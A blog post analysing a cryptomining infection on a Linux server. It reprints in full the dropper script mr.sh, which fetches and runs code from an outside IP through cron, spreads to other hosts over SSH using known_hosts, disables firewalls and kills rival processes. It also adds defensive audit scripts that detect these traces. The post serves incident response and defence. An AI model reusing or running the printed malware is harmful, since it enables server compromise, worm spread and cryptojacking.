Analyzing a cryptomining virus
Posted by 烂笔头儿
Editor's preface: this article was compiled by the editors of 小常识网 (cha138.com). It walks through the analysis of a cryptomining virus; we hope it serves as a useful reference.
The server's CPU usage was abnormal.
I checked the process list.
I killed the process and deleted its file, but a moment later it was back: sssus3 wc.conf
So I checked the cron jobs:
> cat /var/spool/cron/apache
* * * * * wget -q -O - http://107.174.47.156/mr.sh | bash -sh > /dev/null 2>&1
Sure enough, there was a cron job.
I cleared the cron job, but it came back after a while, so I pulled down the script the cron job runs and studied it (http://107.174.47.156/mr.sh):
#!/bin/sh
mkdir /var/tmp
chmod 777 /var/tmp/kworkerds
echo -e "\n0.0.0.0 pastebin.com" >> /etc/hosts
touch /etc/ld.so.preload
# remove the immutable lock
chattr -i /usr/bin/wget
chmod 755 /usr/bin/wget
chattr -i /usr/bin/curl
chmod 755 /usr/bin/curl
# stop the firewall
/etc/init.d/iptables stop
service iptables stop
# SuSE systems
SuSEfirewall2 stop
reSuSEfirewall2 stop
# kill existing (competing) processes
pkill -f sysxlj
pkill -f jourxlv
pkill -f sustes
# kill processes holding socket connections
netstat -antp | grep '56415' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '139.99.120.75' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
ps aux|grep "I2NvZGluZzogdXRmLTg"|grep -v grep|awk '{print $2}'|xargs kill -9
# clean up old files
rm -rf /usr/lib/void.so
rm -rf /etc/voidonce.sh
rm -rf /usr/local/lib/libjdk.so
rm -rf /usr/local/lib/libntp.so
# download and spread the virus script
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
    for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL http://107.174.47.156/mr.sh||wget -q -O- http://107.174.47.156/mr.sh)|bash -sh >/dev/null 2>&1 &' & done
fi
# download the virus script
for file in /home/*
do
    if test -d $file
    then
        if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then
            for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL http://107.174.47.156/mr.sh||wget -q -O- http://107.174.47.156/mr.sh)|bash -sh >/dev/null 2>&1 &' & done
        fi
    fi
done
sed -i '$d' /etc/crontab
rm -rf /lib64/library1.so
rm -rf /usr/lib64/library1.so
# unblock IPs
iptables -I OUTPUT -s 167.99.166.61 -j DROP
iptables -I INPUT -s 167.99.166.61 -j DROP
iptables -I OUTPUT -p tcp -m string --string "pastebin" --algo bm -j DROP
iptables -I OUTPUT -p udp -m string --string "pastebin" --algo kmp -j DROP
rm -rf /etc/cron.monthly/oanacroner
rm -rf /etc/cron.daily/oanacroner
rm -rf /etc/cron.hourly/oanacroner
rm -rf /usr/local/bin/dns
echo "" > /etc/crontab
echo "" > /etc/cron.d/root
echo "" > /etc/cron.d/apache
echo "" > /var/spool/cron/root
echo "" > /var/spool/cron/crontabs/root
# disguised program 1
chkconfig --del netdns
pkill -f netdns
echo "" > /etc/cron.d/system
chmod 777 /var/tmp
rm -rf /usr/local/bin/dns
rm -rf /usr/sbin/netdns
rm -rf /etc/init.d/netdns
rm -rf /etc/cron.monthly/oanacroner
rm -rf /etc/cron.daily/oanacroner
rm -rf /etc/cron.hourly/oanacroner
# disguised program 2
chattr -i /usr/local/lib/libntpd.so
chmod 777 /usr/local/lib/libntpd.so
rm -rf /usr/local/lib/libntpd.so
sed -i '/libntpd.so/d' /etc/ld.so.preload
crontab -l | sed '/pastebin.com/d' | crontab -
netstat -antp | grep '27.155.87.59\|51.38.133.232' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '27.155.87.59\|51.38.133.232' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13\|51.38.133.232' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13\|51.38.133.232' | grep 'CLOSE_WAIT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13\|51.38.133.232' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '121.18.238.56\|51.38.133.232' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '121.18.238.56\|51.38.133.232' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '103.99.115.220\|51.38.133.232' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '103.99.115.220\|51.38.133.232' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
pkill -f /usr/bin/.sshd
netstat -antp | grep '202.144.193.110:3333\|51.38.133.232' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
rm -rf /var/tmp/j*
rm -rf /tmp/j*
rm -rf /var/tmp/java
rm -rf /tmp/java
rm -rf /var/tmp/java2
rm -rf /tmp/java2
rm -rf /var/tmp/java*
rm -rf /tmp/java*
chattr -i /usr/lib/libiacpkmn.so.3 && rm -rf /usr/lib/libiacpkmn.so.3
chattr -i /etc/init.d/nfstruncate && rm -rf /etc/init.d/nfstruncate
rm -rf /etc/rc.d/rc*.d/S01nfstruncate /bin/nfstruncate
rm -rf /tmp/qW3xT.2 /tmp/ddgs.3013 /tmp/ddgs.3012 /tmp/wnTKYg /tmp/2t3ik
rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
rm -rf /tmp/*index_bak*
rm -rf /tmp/*httpd.conf*
rm -rf /tmp/*httpd.conf
# add cron jobs
echo -e "*/1 * * * * root (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh\n##" > /etc/cron.d/root
echo -e "*/2 * * * * root (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh\n##" > /etc/cron.d/apache
echo -e "*/30 * * * * (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh\n##" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo -e "* * * * * (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh\n##" > /var/spool/cron/crontabs/root
mkdir -p /etc/cron.hourly
(curl -fsSL --connect-timeout 120 http://107.174.47.156/11 -o /etc/cron.hourly/oanacroner1||http://107.174.47.156/11 -O /etc/cron.hourly/oanacroner1) && chmod 755 /etc/cron.hourly/oanacroner1
rm -rf /tmp/a7b104c270
rm -rf /tmp/.uninstall* /tmp/.python* /tmp/.tables* /tmp/.mas
rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache
netstat -anp | grep :13531 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
chmod 777 /var/tmp/sustse
# CPU threshold check
ps aux | grep -vw 'kworkerds\|sustse' | awk '{if($3>30.0) print $2}' | while read procid
do
    kill -9 $procid
done
ps ax | grep /tmp/ | grep -v grep | grep -v 'kworkerds\|sustse\|kworkerds\|sustse\|ppl' | awk '{print $1}' | xargs kill -9
ps ax | grep 'wc.conf\|wq.conf\|wm.conf' | grep -v grep | grep -v 'kworkerds\|sustse\|kworkerds\|sustse\|ppl' | awk '{print $1}' | xargs kill -9
netstat -ant|grep '185.161.70.34:3333\|154.16.67.133:80\|205.185.122.99:3333'|grep 'ESTABLISHED'|grep -v grep
if [ $? -eq 0 ]
then
    pwd
else
    curl -s http://107.174.47.156/2mr.sh | bash -sh || wget -q -O - http://107.174.47.156/2mr.sh | bash -sh
fi
sleep 2
# check the cron job
# -q: returns 0 when there is a match
if crontab -l | grep -q "107.174.47.156"
then
    echo "Cron exists"
else
    crontab -r
    echo "Cron not found"
    LDR="wget -q -O -"
    if [ -s /usr/bin/curl ]; then LDR="curl"; fi
    if [ -s /usr/bin/wget ]; then LDR="wget -q -O -"; fi
    (crontab -l 2>/dev/null; echo "* * * * * $LDR http://107.174.47.156/mr.sh | bash -sh > /dev/null 2>&1")| crontab -
fi
rm -rf /var/tmp/jrm
rm -rf /tmp/jrm
pkill -f 185.222.210.59
pkill -f 95.142.40.81
pkill -f 192.99.142.232
chmod 777 /var/tmp/sustse
crontab -l | sed '/185.222.210.59/d' | crontab -
Read through it yourselves; once you have, you will know what to do: delete authorized_keys and known_hosts entirely.
Regex matching
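The script above re-creates its cron entries in five places every minute or two, which is why killing the process and clearing one crontab did not stick. The audit below is an added example (not code from the original post or from the malware) that hunts for those traces on a host: every cron location the script writes to, a created /etc/ld.so.preload, and the pastebin.com sinkhole line in /etc/hosts. The file locations come from the script; the "download a URL and pipe it into a shell" regex is my own generalisation of the cron lines it installs, and the root-directory argument is an assumption so the check can run against a copied or constructed tree rather than the live system.

```shell
#!/bin/bash
# Added example, not part of the original post: audit a filesystem tree for the
# persistence traces left by mr.sh. ROOT defaults to / but can point at a mounted
# image or a constructed directory (the sample tree used in testing is constructed).

# Cron lines that fetch a URL with curl/wget and pipe the result straight into
# sh or bash. This is the shape of every cron entry mr.sh installs.
PIPE_TO_SHELL='(curl|wget)[^|]*https?://[^|]*\|[[:space:]]*(ba)?sh'

# Print "file:line" for each matching entry in the cron locations under $1.
find_cron_droppers() {
    local root="${1:-/}" f
    for f in "$root"/etc/crontab "$root"/etc/cron.d/* \
             "$root"/var/spool/cron/* "$root"/var/spool/cron/crontabs/* \
             "$root"/etc/cron.hourly/* "$root"/etc/cron.daily/* \
             "$root"/etc/cron.monthly/*; do
        [ -f "$f" ] || continue          # skip unexpanded globs and directories
        grep -HE "$PIPE_TO_SHELL" "$f" || true
    done
}

# Number of matching cron entries under $1.
count_cron_droppers() {
    find_cron_droppers "$1" | wc -l | tr -d '[:space:]'
}

# Other traces: mr.sh creates /etc/ld.so.preload (an earlier variant listed a
# library in it) and appends "0.0.0.0 pastebin.com" to /etc/hosts to starve
# competing miners. A clean host normally has neither.
find_other_traces() {
    local root="${1:-/}"
    if [ -e "$root/etc/ld.so.preload" ]; then
        echo "ld.so.preload present, contents: '$(tr '\n' ' ' < "$root/etc/ld.so.preload")'"
    fi
    if grep -qE '^0\.0\.0\.0[[:space:]]+pastebin\.com' "$root/etc/hosts" 2>/dev/null; then
        echo "hosts file sinkholes pastebin.com"
    fi
}

# Number of other traces under $1.
count_other_traces() {
    local root="${1:-/}" n=0
    [ -e "$root/etc/ld.so.preload" ] && n=$((n + 1))
    grep -qE '^0\.0\.0\.0[[:space:]]+pastebin\.com' "$root/etc/hosts" 2>/dev/null && n=$((n + 1))
    echo "$n"
}

# Full report for one tree.
audit_host() {
    local root="${1:-/}"
    echo "== cron entries that pipe a download into a shell =="
    find_cron_droppers "$root"
    echo "== other traces =="
    find_other_traces "$root"
    echo "total findings: $(( $(count_cron_droppers "$root") + $(count_other_traces "$root") ))"
}

# Usage: audit.sh /            (live host, run as root to read the cron spools)
#        audit.sh /mnt/image   (a mounted disk image)
if [ $# -gt 0 ]; then
    audit_host "$1"
fi
```

Because the script also toggles the immutable bit with chattr -i on wget, curl and its own files, check `lsattr` on /usr/bin/wget, /usr/bin/curl and any flagged cron file as well; an unexpected `i` attribute is a further sign that this script, or a relative of it, has run. Removing the cron entries and killing the miner need to happen in the same step, otherwise the next minute's cron run restores both.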
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts);
do
    ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL http://107.174.47.156/mr.sh||wget -q -O- http://107.174.47.156/mr.sh)|bash -sh >/dev/null 2>&1 &' &
done
BatchMode: no interactive prompt is shown.
ConnectTimeout: the connection timeout.
StrictHostKeyChecking: takes yes|no|ask and controls two things:
1. whether the remote host's public key is automatically recorded in known_hosts, and
2. whether the local host is still allowed to log in when the remote host's public key has changed.
With StrictHostKeyChecking=no, the remote host's public key is added to known_hosts automatically on connection without asking the user whether to record it, and if the remote host's public key has changed the connection still goes through instead of failing on the key mismatch.
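The loop only works because known_hosts hands it a ready-made target list in plain text, and because BatchMode=yes means it can only succeed where the private key needs no passphrase. The check below is an added example (not code from the original post or from the malware) that applies the page's own regex to a known_hosts file to show what the loop would have harvested from each account, and mirrors the script's two preconditions (known_hosts plus id_rsa.pub). It also shows the caveat behind the author's "delete known_hosts" advice: a known_hosts written with HashKnownHosts yes (or converted with ssh-keygen -H) exposes no addresses to this regex at all, so the host keys can be kept without keeping the target list. The sample files in the test are constructed.

```shell
#!/bin/bash
# Added example, not part of the original post: measure the exposure of one or
# more home directories to the known_hosts harvesting loop in mr.sh.

# The page's own IPv4 regex, as used by the malware loop.
IPV4_RE='\b([0-9]{1,3}\.){3}[0-9]{1,3}\b'

# The distinct IPv4 addresses the loop would iterate over, one per line.
harvest_targets() {
    grep -oE "$IPV4_RE" "$1" 2>/dev/null | sort -u
}

# How many targets a known_hosts file exposes.
count_targets() {
    harvest_targets "$1" | wc -l | tr -d '[:space:]'
}

# True when every non-comment, non-blank line is hashed ("|1|salt|hash ..."),
# i.e. the file was written under HashKnownHosts yes or run through ssh-keygen -H.
all_hashed() {
    ! grep -vqE '^(\||#|[[:space:]]*$)' "$1"
}

# Mirror the script's precondition for one home directory and report.
# Returns 0 when the account could have served as a launch point.
assess_home() {
    local home="$1" kh="$1/.ssh/known_hosts" n
    if [ ! -f "$kh" ] || [ ! -f "$home/.ssh/id_rsa.pub" ]; then
        echo "$home: not usable by the loop (no known_hosts or no id_rsa.pub)"
        return 1
    fi
    n=$(count_targets "$kh")
    if [ "$n" = "0" ]; then
        echo "$home: known_hosts present but exposes no IPv4 targets (hashed or hostname-only)"
        return 1
    fi
    echo "$home: $n IPv4 target(s) exposed in $kh"
    return 0
}

# Usage: assess.sh /root /home/*
if [ $# -gt 0 ]; then
    for h in "$@"; do assess_home "$h" || true; done
fi
```

Any address that assess_home reports is a host that this server could have pushed mr.sh to, so those hosts need the same cron and process check. Going forward, `HashKnownHosts yes` in ssh_config and a passphrase (or an agent) on the private key each remove one of the two things the loop depends on.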